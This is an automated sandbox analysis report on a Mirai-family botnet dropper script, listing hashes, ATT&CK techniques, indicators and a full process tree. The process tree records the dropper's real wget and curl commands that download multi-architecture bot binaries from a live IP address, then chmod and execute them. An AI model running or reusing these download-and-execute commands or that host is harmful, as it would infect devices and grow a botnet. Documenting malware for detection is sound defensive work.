mirai | fc9b314f205b5c4b94f8d88d99d811494329aef8cd7d47b3f9c713b45f66d0dd

Analysis

max time kernel
150s
max time network
156s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
17-02-2025 10:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kraapje.sh
Size

2KB
MD5

9787bbe5335e577aefac885ca109b8ab
SHA1

16695628fa69d948c90dc7caa43848b3f0736a91
SHA256

fc9b314f205b5c4b94f8d88d99d811494329aef8cd7d47b3f9c713b45f66d0dd
SHA512

01b5b4480ff482ff952992132ab593ac98413b21142863dd576e3f7d769b3348a497ff78996ad3a6b924eefe7fc03dde6df6bf9ea5e88b49863030f8019143b5

Score

10^/10

mirai kurc botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (60652) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
847	chmod
856	chmod
866	chmod
875	chmod
763	chmod
829	chmod
838	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/kraapje	764	kraapje.sh
/tmp/kraapje	830	kraapje.sh
/tmp/kraapje	839	kraapje.sh
/tmp/kraapje	848	kraapje.sh
/tmp/kraapje	857	kraapje.sh
/tmp/kraapje	867	kraapje.sh
/tmp/kraapje	876	kraapje.sh

Modifies Watchdog functionality 1 TTPs 12 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje
File opened for modification	/dev/misc/watchdog	kraapje
File opened for modification	/dev/watchdog	kraapje

Enumerates active TCP sockets 1 TTPs 5 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje

Writes file to system bin folder 12 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje
File opened for modification	/bin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje
File opened for modification	/sbin/watchdog	kraapje

Changes its process name 6 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	eenaklaFkBbrArxr	830	kraapje
Changes the process name, possibly in an attempt to hide itself	gvlEADFEeoeclCAE3	839	kraapje
Changes the process name, possibly in an attempt to hide itself	FpFEBDycwAlEcwty	848	kraapje
Changes the process name, possibly in an attempt to hide itself	tbfspkFilfuknFkd6	857	kraapje
Changes the process name, possibly in an attempt to hide itself	gtBtcsndwhuDCilF	867	kraapje
Changes the process name, possibly in an attempt to hide itself	smnttyrfDpEh,5	876	kraapje

Reads system network configuration 1 TTPs 5 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje
File opened for reading	/proc/net/tcp	kraapje

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/712/fd	kraapje
File opened for reading	/proc/235/fd	kraapje
File opened for reading	/proc/380/fd	kraapje
File opened for reading	/proc/322/fd	kraapje
File opened for reading	/proc/381/fd	kraapje
File opened for reading	/proc/139/fd	kraapje
File opened for reading	/proc/325/fd	kraapje
File opened for reading	/proc/841/fd	kraapje
File opened for reading	/proc/139/fd	kraapje
File opened for reading	/proc/327/fd	kraapje
File opened for reading	/proc/164/fd	kraapje
File opened for reading	/proc/715/fd	kraapje
File opened for reading	/proc/508/fd	kraapje
File opened for reading	/proc/510/fd	kraapje
File opened for reading	/proc/164/fd	kraapje
File opened for reading	/proc/510/fd	kraapje
File opened for reading	/proc/715/fd	kraapje
File opened for reading	/proc/473/fd	kraapje
File opened for reading	/proc/473/fd	kraapje
File opened for reading	/proc/473/fd	kraapje
File opened for reading	/proc/327/fd	kraapje
File opened for reading	/proc/380/fd	kraapje
File opened for reading	/proc/391/fd	kraapje
File opened for reading	/proc/473/fd	kraapje
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/380/fd	kraapje
File opened for reading	/proc/834/fd	kraapje
File opened for reading	/proc/715/fd	kraapje
File opened for reading	/proc/508/fd	kraapje
File opened for reading	/proc/480/fd	kraapje
File opened for reading	/proc/408/fd	kraapje
File opened for reading	/proc/321/fd	kraapje
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/715/fd	kraapje
File opened for reading	/proc/712/fd	kraapje
File opened for reading	/proc/869/fd	kraapje
File opened for reading	/proc/473/fd	kraapje
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/322/fd	kraapje
File opened for reading	/proc/508/fd	kraapje
File opened for reading	/proc/859/fd	kraapje
File opened for reading	/proc/164/fd	kraapje
File opened for reading	/proc/691/fd	kraapje
File opened for reading	/proc/380/fd	kraapje
File opened for reading	/proc/480/fd	kraapje
File opened for reading	/proc/325/fd	kraapje
File opened for reading	/proc/480/fd	kraapje
File opened for reading	/proc/691/fd	kraapje
File opened for reading	/proc/715/fd	kraapje
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/843/fd	kraapje
File opened for reading	/proc/355/fd	kraapje
File opened for reading	/proc/139/fd	kraapje
File opened for reading	/proc/380/fd	kraapje
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/139/fd	kraapje
File opened for reading	/proc/408/fd	kraapje
File opened for reading	/proc/712/fd	kraapje
File opened for reading	/proc/381/fd	kraapje
File opened for reading	/proc/391/fd	kraapje
File opened for reading	/proc/322/fd	kraapje
File opened for reading	/proc/1/fd	kraapje
File opened for reading	/proc/381/fd	kraapje
File opened for reading	/proc/381/fd	kraapje

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
767	wget
774	curl
828	cat

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/kre4per.mips	curl
File opened for modification	/tmp/kre4per.arm5	wget
File opened for modification	/tmp/kre4per.arm5	curl
File opened for modification	/tmp/kre4per.arm6	curl
File opened for modification	/tmp/kre4per.x86	curl
File opened for modification	/tmp/kre4per.mips	wget
File opened for modification	/tmp/kre4per.arm6	wget
File opened for modification	/tmp/kre4per.arm7	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/kre4per.x86	wget
File opened for modification	/tmp/kraapje	kraapje.sh
File opened for modification	/tmp/kre4per.arm4	curl
File opened for modification	/tmp/kre4per.mpsl	wget
File opened for modification	/tmp/kre4per.mpsl	curl
File opened for modification	/tmp/kre4per.arm7	curl

/tmp/kraapje.sh
/tmp/kraapje.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:712
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:716
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.x86
  2⤵
  - Writes file to tmp directory
  PID:722
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.x86
  2⤵
  - Writes file to tmp directory
  PID:743
- /bin/cat
  cat kre4per.x86
  2⤵
  PID:761
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.x86 systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-2WN6nh
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/kraapje
  ./kraapje
  2⤵
  PID:764
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:767
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:774
- /bin/cat
  cat kre4per.mips
  2⤵
  - System Network Configuration Discovery
  PID:828
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.mips kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:830
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.mpsl
  2⤵
  - Writes file to tmp directory
  PID:835
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.mpsl
  2⤵
  - Writes file to tmp directory
  PID:836
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.mips kre4per.mpsl kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:839
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.arm4
  2⤵
  PID:844
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:845
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.arm4 kre4per.mips kre4per.mpsl kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:847
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:848
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.arm5
  2⤵
  - Writes file to tmp directory
  PID:853
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:854
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.arm4 kre4per.arm5 kre4per.mips kre4per.mpsl kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:857
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.arm6
  2⤵
  - Writes file to tmp directory
  PID:862
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.arm4 kre4per.arm5 kre4per.arm6 kre4per.mips kre4per.mpsl kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:867
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.arm7
  2⤵
  - Writes file to tmp directory
  PID:870
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:873
- /bin/chmod
  chmod +x busybox kraapje kraapje.sh kre4per.arm4 kre4per.arm5 kre4per.arm6 kre4per.arm7 kre4per.mips kre4per.mpsl kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/kraapje
  ./kraapje
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/busybox

Filesize
857KB

MD5
a39fe8036e559ce804e26518061e59ff

SHA1
8df27f6e8a48b762d945ea2f2b87390c80acd4de

SHA256
3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38

SHA512
e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d

Download Submit
/tmp/kraapje

Filesize
78KB

MD5
d92e548f36b2aa2552fc83383e804d53

SHA1
f1c13158275aed74a3bb45c2bf391db9579d65ec

SHA256
06ac8edf0186be1542368d19ffe3db1c146731ffd2f13a77d7112161787ff37e

SHA512
5e068ddcceabc2535357abd0b8bfb8e1b9822fafe8f524e6c3ab4c380dde6f1be06bc24ed8bf1bd41dd8d3c030ea0993b6b6f9d399898233fd1f51953fb82b59

Download Submit
/tmp/kre4per.x86

Filesize
53KB

MD5
7ffbdf8a1d617b2c93d5fc520ccb31cc

SHA1
5dbe3ceeb1e58a61671b74d040b809d343d24b53

SHA256
7c3b7d80a9f95b61e3a56a62493c5f3336eabd766a17d2d07e28d01ec750f7eb

SHA512
3de46ad924e9ceab846f2a09933a1cb654e5e70c8a4bf84d395c8492470b8bcc0afc838b3f4ceb8086c81e4beba5c2884bd59a202d6c682ae58c6d2a28766727

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads